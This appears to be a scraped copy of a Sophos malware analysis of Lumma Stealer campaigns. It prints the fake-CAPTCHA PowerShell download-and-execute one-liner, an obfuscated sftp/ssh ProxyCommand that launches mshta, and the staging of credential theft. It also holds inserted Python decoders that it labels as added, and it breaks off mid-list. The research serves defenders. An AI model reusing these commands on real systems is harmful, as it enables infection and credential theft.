{"id":2293,"date":"2025-05-10T10:50:12","date_gmt":"2025-05-10T10:50:12","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=2293"},"modified":"2025-05-10T10:50:13","modified_gmt":"2025-05-10T10:50:13","slug":"lumma-stealer-coming-and-going-sophos-information","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=2293","title":{"rendered":"Lumma Stealer, coming and going \u2013 Sophos News"},"content":{"rendered":"<div>\n<p>In September 2024, a threat hunt across Sophos Managed Detection and Response\u2019s telemetry uncovered a Lumma Stealer campaign using fake CAPTCHA sites that instructed victims to paste a (malicious) PowerShell command into the Windows Run dialog. Subsequent investigations allowed us to dig deeply into the mechanics of the notorious infostealer. This post recounts those discoveries, as seen in various MDR investigations during the fall and winter of 2024-25.<\/p>\n<h3><strong>Lumma Stealer basics<\/strong><\/h3>\n<p>Lumma Stealer has been active since mid-2022 and is believed to have originated with a Russian-language developer. Offered as Malware-as-a-Service (MaaS), its maintainer sells access to the stealer via Telegram and provides updates and user support. Further information is made available on a dedicated Gitbook site.<\/p>\n<p>The infostealer targets a variety of valuables, including passwords, session tokens, cryptocurrency wallets, and personal information from compromised devices. The threat is amplified by its cunning delivery methods. In one instance, the attacker manipulated users\u2019 trust in CAPTCHA challenges and employed social engineering tactics to deceive victims seeking software downloads. 
In another, more straightforward case, the user was directed to a malicious site and prompted to open a file in Windows Explorer.<\/p>\n<p>The variations we observed in Lumma Stealer behavior are important to defenders, because Lumma Stealer infection has been extremely widespread in recent months. That said, the delivery methods we observed could easily be adapted to other malware beyond Lumma Stealer, which makes documenting them useful in its own right. (A list of IoCs is available on <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/sophoslabs\/IoCs\">our GitHub repository<\/a>.)<\/p>\n<p>Our researchers are aware of similar work <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.netskope.com\/blog\/lumma-stealer-fake-captchas-new-techniques-to-evade-detection\">underway<\/a> from Netskope Threat Labs, including an estimate that as many as 5,000 fake-CAPTCHA sites may currently be involved in a Lumma Stealer-related campaign. Likewise, researchers at Qualys have done solid research to <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/blog.qualys.com\/vulnerabilities-threat-research\/2024\/10\/20\/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\">detail<\/a> the mechanisms Lumma Stealer has used in recent months. Sophos strongly recommends scrutiny of the IoCs these researchers have provided to the public, in addition to our own.<\/p>\n<h2><strong>Investigation #1: The art(istsponsorship) of the steal<\/strong><\/h2>\n<p>In this investigation, the observed attack flow with CAPTCHA involvement was relatively simple: the attacker creates a malicious site, \u201cprotected\u201d by a normal-looking CAPTCHA verification at hxxps[:\/\/]camplytic[.]com\/go\/cdff9f96-8cbd-4c44-b679-2f612a64cd00. 
The visiting user clicks on the familiar I-am-not-a-robot box, as shown in Figure 1.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig01.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960855\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig01.png\" alt=\"A legitimate-seeming verification challenge\" width=\"445\" height=\"229\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig01.png 445w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig01.png?resize=300,154 300w\" sizes=\"auto, (max-width: 445px) 100vw, 445px\"\/><\/a><\/p>\n<p><em>Figure 1: A familiar-seeming verification box<\/em><\/p>\n<p>The user was next redirected to another alleged verification page, hxxps[:\/\/]sos-at-vie-1[.]exo[.]io\/store-as\/cloudflare-new-artist[.]html, on which they were asked to first open the Windows \u201cRun\u201d dialog, then press Ctrl-V followed by Enter, as shown in Figure 2.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig02.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960856\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig02.png\" alt=\"A second verification challenge, described in text\" width=\"640\" height=\"432\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig02.png 660w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig02.png?resize=300,203 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 2: The next \u201csecurity check\u201d request is somewhat unusual, but fairly easy for unwary users<\/em><\/p>\n<p>Behind the scenes, a concealed JavaScript function on the page has already copied a PowerShell command to the clipboard when the user interacts with the fake challenge. The user supplies the missing step: pasting that text into the Run dialog and pressing Enter launches PowerShell in a hidden window:<\/p>\n<pre>\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -W Hidden -command $uR='hxxps[:\/\/]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com\/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t<\/pre>\n<p>That one-liner fetches a second-stage script from an attacker-controlled Alibaba Cloud OSS bucket, and it\u2019s off to the payload-retrieval races, as shown in Figure 3.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig03.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960857\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig03.png\" alt=\"A flow chart depicting attack flow for Lumma Stealer\" width=\"640\" height=\"247\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig03.png 843w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig03.png?resize=300,116 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig03.png?resize=768,297 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 3: Attack flow with CAPTCHA abuse; note that Lumma Stealer itself is loaded midway through the process<\/em><\/p>\n<p>When run, the pasted command downloads the first stage of the malicious payload onto the compromised system. The command<\/p>\n<pre>$uR='hxxps[:\/\/]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com\/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t<\/pre>\n<p>retrieves the content of the new-artist.txt file hosted on the external server. 
This content is then passed straight to the Invoke-Expression cmdlet and executed, without ever touching disk.<\/p>\n<p>The new-artist.txt file in the code above contains another PowerShell script, which connects to hxxps[:\/\/]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com\/artist[.]zip. This zipped copy of Lumma Stealer is downloaded to the target machine, extracted into the user\u2019s %AppData% path, and saved as \u2018ArtistSponsorship.exe\u2019 (sha1: e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a) for further execution, as shown in Figure 4.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig04.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960858\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig04.png\" alt=\"The poisoned download described in text\" width=\"640\" height=\"260\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig04.png 652w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig04.png?resize=300,122 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 4: The poisoned download<\/em><\/p>\n<p>The ArtistSponsorship.exe file contains, among several dropped files as seen in Figure 5, an obfuscated AutoIt script (sha256:05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7) alongside the AutoIt3.exe interpreter that runs it. 
These are dropped in the %temp% directory.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig05.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960859\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig05.png\" alt=\"A listing of assorted files dropped by the malicious downloader\" width=\"350\" height=\"297\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig05.png 350w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig05.png?resize=300,255 300w\" sizes=\"auto, (max-width: 350px) 100vw, 350px\"\/><\/a><\/p>\n<p><em>Figure 5: Several files dropped into %temp% by ArtistSponsorship.exe<\/em><\/p>\n<p>The AutoIt script does a number of things and includes shellcode. Among its actions, it connects to the C2 domain snail-r1ced[.]cyou \u2013 IP 104.21.84[.]251 (CLOUDFLARENET). Because that address belongs to Cloudflare\u2019s reverse-proxy range rather than to the attacker, the domain is the indicator worth blocking; the IP is shared with legitimate sites. Lumma Stealer then targets user data, login credentials from various browsers, bitcoin wallets, and cookies. 
In Figure 6, AutoIt3.exe is accessing login data and cookies used by the Chrome browser.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig06.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960860\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig06.png\" alt=\"Log activity caused by the described EXE\" width=\"640\" height=\"146\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig06.png 1014w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig06.png?resize=300,68 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig06.png?resize=768,175 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 6: Catching AutoIt3.exe red-handed with Chrome login credentials (among other things)<\/em><\/p>\n<p>AutoIt3.exe then executes the script X.a3x to exfiltrate the captured Chrome login data and cookies to the C2 IP 104.21.84[.]251 (CLOUDFLARENET). In the case we observed, a file of just 6.37MB \u2013 the login data and cookies \u2013 was successfully exfiltrated, after which the AutoIt3.exe process terminated.<\/p>\n<h2><strong>Investigation #2: A deep dive into the code<\/strong><\/h2>\n<p>In this section, we\u2019ll dig much more deeply into the specifics of the files and processes we encountered within the payload delivery chain. 
In the case we\u2019ll examine, the user inadvertently visited an infected site.<\/p>\n<p>First, the user was prompted to open a PDF-format file in Windows Explorer, as shown in Figure 7.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig07.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960861\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig07.png\" alt=\"An apparently legitimate &quot;PDF,&quot; with a warning visible\" width=\"640\" height=\"309\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig07.png 1280w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig07.png?resize=300,145 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig07.png?resize=768,370 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig07.png?resize=1024,494 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 7: The user is attempting to load a PDF, but that\u2019s not what\u2019s about to happen<\/em><\/p>\n<p>The file, apparently a PDF called \u201cInstruction_695-18014-012_Rev.PDF,\u201d is actually a remotely hosted .lnk (shortcut) file, as shown in Figure 8. The \u201cpublisher could not be verified\u201d warning Windows raises for a shortcut opened from a remote location is the only clue the user gets.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig08.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960862\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig08.png\" alt=\"A system message indicating that authorship of the alleged &quot;PDF&quot; cannot be verified\" width=\"640\" height=\"345\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig08.png 1017w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig08.png?resize=300,162 300w, 
https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig08.png?resize=768,415 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 8: Windows warns that this is actually a shortcut, not a PDF<\/em><\/p>\n<p>The shortcut file attempts to execute an obfuscated PowerShell script, as shown in Figure 9.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig09.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960863\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig09.png\" alt=\"A view of the shortcut showing a great deal of obfuscation\" width=\"640\" height=\"337\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig09.png 1125w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig09.png?resize=300,158 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig09.png?resize=768,404 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig09.png?resize=1024,539 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 9: The obfuscated script in the Target field<\/em><\/p>\n<p>The full text of the obfuscated shortcut target is<\/p>\n<pre>C:\\Windows\\System32\\OpenSSH\\sftp.exe -o ProxyCommand=\"powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]\/]]]]]]\/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op\/W7]]]7Z9]]]].mp4]]' -replace ']')\"<\/pre>\n<p>The obfuscation is nothing more than padding: -replace takes a regular expression, a lone ] is a literal, and stripping every ] from the string leaves mshta.exe hxxps[:\/\/]static[.]klipxuhaq[.]shop\/W77Z9[.]mp4, so mshta.exe is handed a remotely hosted HTA whose .mp4 extension it ignores. When a user executes the shortcut file, sftp.exe will execute the obfuscated command via the ProxyCommand option. 
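<\/p>
<p>Because the only transformation is a regex replace, the real command can be recovered offline without running anything. The Python below is an added example, not code from the Sophos write-up or from the Lumma operators: it finds the PowerShell '...' -replace '...' construct in a command line (the shortcut target quoted above is reproduced as constructed test input), applies the replace the way PowerShell would (regex-based, case-insensitive unless -creplace is used, with a second argument as the replacement when present), and reports the decoded command, the LOLBin it invokes and any URLs in defanged form. Handling of the two-argument form and of the doubled-quote escape goes beyond what this particular lure needs; the construct allows both, so a decoder should too.<\/p>

```python
import re

# Constructed test input: the shortcut target quoted above, with the page's own
# ]-padding and two-level powershell call (written out here so the decoder has
# realistic input; nothing is fetched or executed).
SAMPLE_TARGET = (
    "C:\\Windows\\System32\\OpenSSH\\sftp.exe -o ProxyCommand=\"powershell powershell "
    "-Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/"
    "s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' -replace ']')\""
)

# PowerShell:  '<padded text>' -replace '<regex>'[, '<replacement>']
# -replace is regex based and case-insensitive; -creplace is the case-sensitive form.
_REPLACE = re.compile(
    r"'(?P<body>(?:[^']|'')*)'\s*-[ic]?replace\s*'(?P<pat>(?:[^']|'')*)'"
    r"(?:\s*,\s*'(?P<rep>(?:[^']|'')*)')?",
    re.IGNORECASE,
)
_URL = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "rundll32", "regsvr32", "certutil",
           "bitsadmin", "wscript", "cscript", "msiexec", "curl"}


def _unquote(s: str) -> str:
    """PowerShell single-quoted literals escape an apostrophe by doubling it."""
    return s.replace("''", "'")


def defang(url: str) -> str:
    """hxxps[://]host[.]tld/path, the convention used for indicators in this post."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme.lower().replace('tt', 'xx')}[://]{host.replace('.', '[.]')}{slash}{path}"


def decode_replace_lure(cmdline: str):
    """Undo a '<padded>' -replace '<pat>' lure; None when the construct is absent."""
    m = _REPLACE.search(cmdline)
    if not m:
        return None
    body, pat = _unquote(m["body"]), _unquote(m["pat"])
    rep = _unquote(m["rep"]) if m["rep"] is not None else ""   # one-arg form deletes matches
    flags = 0 if "-creplace" in m.group(0).lower() else re.IGNORECASE
    decoded = re.sub(pat, lambda _m: rep, body, flags=flags)   # lambda: no $1 / \1 expansion
    tokens = decoded.split()
    first = tokens[0] if tokens else ""
    exe = first.replace("\\", "/").rsplit("/", 1)[-1].lower()
    stem = exe[:-4] if exe.endswith(".exe") else exe
    return {
        "pattern": pat,
        "decoded": decoded,
        "lolbin": first if stem in LOLBINS else None,
        "urls": [defang(u) for u in _URL.findall(decoded)],
    }


if __name__ == "__main__":
    print(decode_replace_lure(SAMPLE_TARGET))
```

<p>Run against the sample target this yields the pattern ], the decoded command mshta.exe followed by the (defanged) static[.]klipxuhaq[.]shop URL, and mshta.exe as the recognised LOLBin. The same function works on the ssh.exe command line shown next, since the ProxyCommand value is carried through unchanged.<\/p>
<p>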
However, sftp.exe doesn\u2019t actually establish the network connection itself; it delegates that task to ssh.exe with a specific set of parameters:<\/p>\n<pre>\"C:\\Windows\\System32\\OpenSSH\\ssh.exe\" \"-oForwardX11 no\" \"-oForwardAgent no\" \"-oPermitLocalCommand no\" \"-oClearAllForwardings yes\" -o \"ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]\/]]]]]]\/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op\/W7]]]7Z9]]]].mp4]]' -replace ']')\" \"-oProtocol 2\" -s -- . sftp .<\/pre>\n<p>As we see in the block of code above, the parameters abuse the \u2018ProxyCommand\u2019 option. ProxyCommand specifies a command to run instead of connecting directly to the target host; ssh.exe runs it unconditionally, before any connection is attempted, so no reachable host is needed. In the example above, ProxyCommand is set to run PowerShell, which in turn executes mshta.exe to download and execute a remote script. The indirection also matters for telemetry: the malicious PowerShell appears as a child of ssh.exe, a signed Microsoft binary, rather than of explorer.exe, so parent-child rules keyed on explorer.exe alone will miss it.<\/p>\n<p>The first PowerShell script execution is as shown in Figure 10.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig10.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960864\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig10.png\" alt=\"Hex code showing the first execution\" width=\"640\" height=\"94\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig10.png 1280w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig10.png?resize=300,44 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig10.png?resize=768,112 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig10.png?resize=1024,150 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 10: The first execution is revealed<\/em><\/p>\n<p>This script processes <a rel=\"nofollow\" target=\"_blank\" 
href=\"https:\/\/www.geeksforgeeks.org\/advanced-encryption-standard-aes\/\">AES<\/a>-encrypted data within the aepcc function, as shown in Figure 11.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960865\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig11.png\" alt=\"Encryption in use\" width=\"640\" height=\"31\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig11.png 1165w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig11.png?resize=300,14 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig11.png?resize=768,37 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig11.png?resize=1024,49 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 11: Lumma Stealer\u2019s creators didn&#8217;t choose a weak encryption algorithm<\/em><\/p>\n<p>In Figure 12, the AES key is listed first, followed by a 16-byte initialization vector (IV) of all zeroes. An IV is meant to randomize the first block of the encryption, but a fixed all-zero IV contributes no randomness at all, and in any case both key and IV are hard-coded in the script; the algorithm is strong, but with the key delivered alongside the ciphertext it serves only as obfuscation. 
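<\/p>
<p>The steps that follow the AES decryption (Figures 12 through 16) are mechanical and worth automating. The Python below is an added example, not the analysts\u2019 CyberChef recipe and not code from the script itself, and its input is constructed: it builds a minimal .NET-style PE, wraps it the way the page describes (decimal byte list, then base64), and models the identifier-to-URL lookup as two-digit indexes into a 100-character table. That mapping is my assumption, chosen because it fits the lengths reported (an 86-character identifier, a 100-character table); the table order, the offsets after the identifier, and the placeholder URL are likewise constructed. The decoder then reverses the layers, sanity-checks the MZ\/PE headers, reports whether the image carries a CLR header (what a .NET Assembly.Load call expects), and recovers the decoy URL.<\/p>

```python
import base64
import re
import string
import struct

# ---- constructed sample ------------------------------------------------------
# Stands in for the AES-decrypted text: key and IV are both in the script, so
# that step is mechanical (CyberChef or any AES library). Layout assumptions,
# mine rather than the page's: the PE rides as base64 of a comma-separated
# decimal byte list; a 100-character table plus an 86-character identifier
# (two-digit indexes into the table) encode the decoy URL.
TABLE = string.printable[::-1]                       # 100 printable chars, scrambled order
DECOY_URL = "https://example.org/pub/irs-pdf/i1040gi.pdf"   # placeholder: 43 chars -> 86-char identifier


def build_sample_pe() -> bytes:
    """Minimal PE32 image with a CLR data directory, i.e. what Assembly.Load() expects."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                      # e_lfanew: COFF header at 0x80
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)                                         # PE32 optional header, 16 data dirs
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)      # dir 14 = CLR runtime header
    return bytes(dos) + coff + bytes(opt)


def encode_identifier(url: str, table: str) -> str:
    return "".join(f"{table.index(ch):02d}" for ch in url)


def layer_encode(pe: bytes) -> str:
    return base64.b64encode(",".join(str(b) for b in pe).encode()).decode()


SAMPLE_B64 = layer_encode(build_sample_pe())
SAMPLE_DECRYPTED = "#" * 103 + encode_identifier(DECOY_URL, TABLE) + TABLE   # identifier at 103, table after it


# ---- decoder -----------------------------------------------------------------
def unpack_layers(b64_text: str) -> bytes:
    """base64 -> decimal byte list -> raw bytes; the separator does not matter."""
    decimals = base64.b64decode(b64_text).decode("ascii")
    return bytes(int(n) for n in re.findall(r"\d+", decimals))


def inspect_pe(data: bytes) -> dict:
    """Sanity-check MZ/PE headers and report what kind of image this is."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsect, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)                  # PE32 vs PE32+ data-directory offset
    clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 14 * 8)
    return {"machine": machine, "sections": nsect, "pe32plus": magic == 0x20B,
            "dll": bool(chars & 0x2000), "managed": clr_rva != 0 and clr_size != 0}


def decode_identifier(ident: str, table: str) -> str:
    if len(ident) % 2 or len(table) != 100:
        raise ValueError("expected an even-length identifier and a 100-char table")
    return "".join(table[int(ident[i:i + 2])] for i in range(0, len(ident), 2))


def recover_stage(b64_text: str, decrypted: str) -> dict:
    ident = decrypted[103:103 + 86]                  # offset and length as reported for the sample
    table = decrypted[103 + 86:103 + 86 + 100]       # table position is my layout assumption
    return {"pe": inspect_pe(unpack_layers(b64_text)), "decoy_url": decode_identifier(ident, table)}


if __name__ == "__main__":
    print(recover_stage(SAMPLE_B64, SAMPLE_DECRYPTED))
```

<p>On the constructed sample, recover_stage reports an i386 PE32 executable with three sections and a populated CLR directory, and returns the placeholder decoy URL. The managed flag is the useful check in practice: a blob that is a PE but has no CLR header would not be something a System.Reflection.Assembly Load call could consume, which would point at a different loader than the one described here.<\/p>
<p>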
With key and IV in hand, we decrypted the data using CyberChef, as shown.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig12.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960866\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig12.png\" alt=\"A CyberChef screen showing the code under examination\" width=\"640\" height=\"385\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig12.png 1196w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig12.png?resize=300,181 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig12.png?resize=768,462 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig12.png?resize=1024,616 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 12: CyberChef begins to reveal what\u2019s going on<\/em><\/p>\n<p>Next, we decoded the script from base64 \u2013 closer to readable, but now a large mass of decimals, as shown in Figure 13.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960867\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig13.png\" alt=\"The questionable file, semi-decoded, now seen in Base64\" width=\"640\" height=\"221\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig13.png 1280w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig13.png?resize=300,104 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig13.png?resize=768,265 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig13.png?resize=1024,354 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 13: The script comes 
into better focus<\/em><\/p>\n<p>The decimals in that mass of numbers are in fact byte values, the file\u2019s raw bytes written out in decimal. A further pass through CyberChef, as shown in Figure 14, reveals that this is a PE file, one designed to download further payloads.<\/p>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig14.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-960868\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig14.png\" alt=\"The PE file fully dissected\" width=\"640\" height=\"608\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig14.png 729w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/05\/lumma-fig14.png?resize=300,285 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\"\/><\/a><\/p>\n<p><em>Figure 14: A PE file with a single malicious purpose<\/em><\/p>\n<p>This script performs the following actions:<\/p>\n<ol>\n<li>Sets variable \u2018O\u2019 equal to the C2 URL.<\/li>\n<li>Dynamically retrieves the \u2018Load\u2019 method from the .NET \u2018System.Reflection.Assembly\u2019 class.<br \/>The \u2018Load\u2019 method is then invoked on the value of variable \u2018oQ7\u2019 (the obfuscated PE); this loads the PE into memory as a managed assembly without writing it to disk.<\/li>\n<li>As displayed above, the PE contains a single static method named \u2018aHdiNKuWlR\u2019. 
